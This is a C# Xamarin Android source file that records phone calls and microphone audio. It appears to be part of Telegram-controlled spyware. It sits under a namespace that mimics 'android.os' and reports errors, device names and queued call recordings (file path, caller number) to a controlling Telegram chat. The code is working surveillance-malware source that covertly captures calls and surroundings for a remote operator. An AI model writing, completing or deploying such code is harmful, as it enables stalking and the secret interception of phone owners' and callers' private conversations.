using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Android.App;
using Android.Content;
using Android.OS;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using Android.Telephony;
using Android.Media;
using Java.IO;
using Java.Text;
using Java.Util;
using Android.Text.Format;
using Android.Content.Res;
using Javax.Net.Ssl;
using TeleSharp.Entities.SendEntities;
using Android.Hardware;
using System.Threading;

namespace android.os
{
    public static class CALLRECORDER
    {
        private static MediaRecorder mRecorder;
        public static void start(string fpth)
        {
            try
            {
                IsAlive = true;
                mRecorder = new MediaRecorder();
                mRecorder.SetAudioSource(AudioSource.Mic);
                mRecorder.SetOutputFormat(OutputFormat.ThreeGpp);
                mRecorder.SetAudioEncoder(AudioEncoder.AmrNb);
                mRecorder.SetMaxFileSize(inf.Values.sharep.GetLong("maxsize", (50 * 1048576)));
                mRecorder.SetOutputFile(fpth);
                mRecorder.Prepare();
                mRecorder.Start();
            }
            catch (Exception ex)
            {
                if (inf.isonline())
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = ex.Message + " =>On CallRecorder On Start Metod()", ChatId = inf.Manager.ChatId });
            }
        }
        public static bool IsAlive { get; set; }
        public static string PhoneNumber { get; set; }
        public static void stopr(string fpth)
        {
            IsAlive = false;
            if (mRecorder != null)
            {
                mRecorder.Stop();
                mRecorder.Reset();
                mRecorder.Release();
                mRecorder = null;
                try
                {
                    if (new System.IO.FileInfo(fpth).Length > inf.Values.sharep.GetLong("maxsize", (50 * 1048576)))
                        System.IO.File.Delete(fpth);
                    else if (inf.Metods.getnotifyidcount("notifyc") > 0)
                    {
                        int[] ids = inf.Metods.getidsnotify("notifyc", 7);
                        for (int i = 0; i < ids.Length; i++)
                        {
                            inf.NotifyList.Add(new Notification
                            {
                                Call = new CallNotify
                                {
                                    Chat_Id = ids[i].ToString(),
                                    DateTime = DateTime.Now,
                                    Path = fpth,
                                    FromNumber = PhoneNumber
                                }
                            });
                        }
                    }
                }
                catch (Exception ex)
                {
                    if (inf.isonline())
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = ex.Message + "\nFrom: " + inf.Metods.devicename(inf.Manager.ChatId), ChatId = inf.Manager.ChatId.ToString() });
                }
            }
        }
    }
    public class RECORDER
    {
        public static string Fpth { get; set; }
        public static long ChatId { get; set; }
        private static MediaRecorder mRecorder { get; set; }
        public static bool IsAlive { get; set; }
        public static void start()
        {
            try
            {
                IsAlive = true;
                mRecorder = new MediaRecorder();
                mRecorder.SetAudioSource(AudioSource.Mic);
                mRecorder.SetOutputFormat(OutputFormat.ThreeGpp);
                mRecorder.SetAudioEncoder(AudioEncoder.AmrNb);
                mRecorder.SetMaxFileSize(inf.Values.sharep.GetLong("maxsize", (50 * 1048576)));
                mRecorder.SetOutputFile(Fpth);
                mRecorder.Prepare();
                mRecorder.Start();
            }
            catch (Exception ex)
            {
                if (inf.isonline())
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = ex + " =>On VoiceRecorder On Start Metod()", ChatId = inf.Manager.ChatId });
            }
        }
        public static void stopr()
        {
            IsAlive = false;
            if (mRecorder != null)
            {
                try
                {
                    mRecorder.Stop();
                    mRecorder.Reset();
                    mRecorder.Release();
                    mRecorder = null;
                }
                catch (Exception ex)
                {
                    if (inf.isonline())
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = ex.Message + " =>On VoiceRecorder On Stop Metod()", ChatId = inf.Manager.ChatId });
                }
            }
            else
            {
                if (inf.isonline())
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "=>On VoiceRecorder On Stop Metod()\nVoice Recorder Is Null", ChatId = inf.Manager.ChatId });
            }
        }
    }
}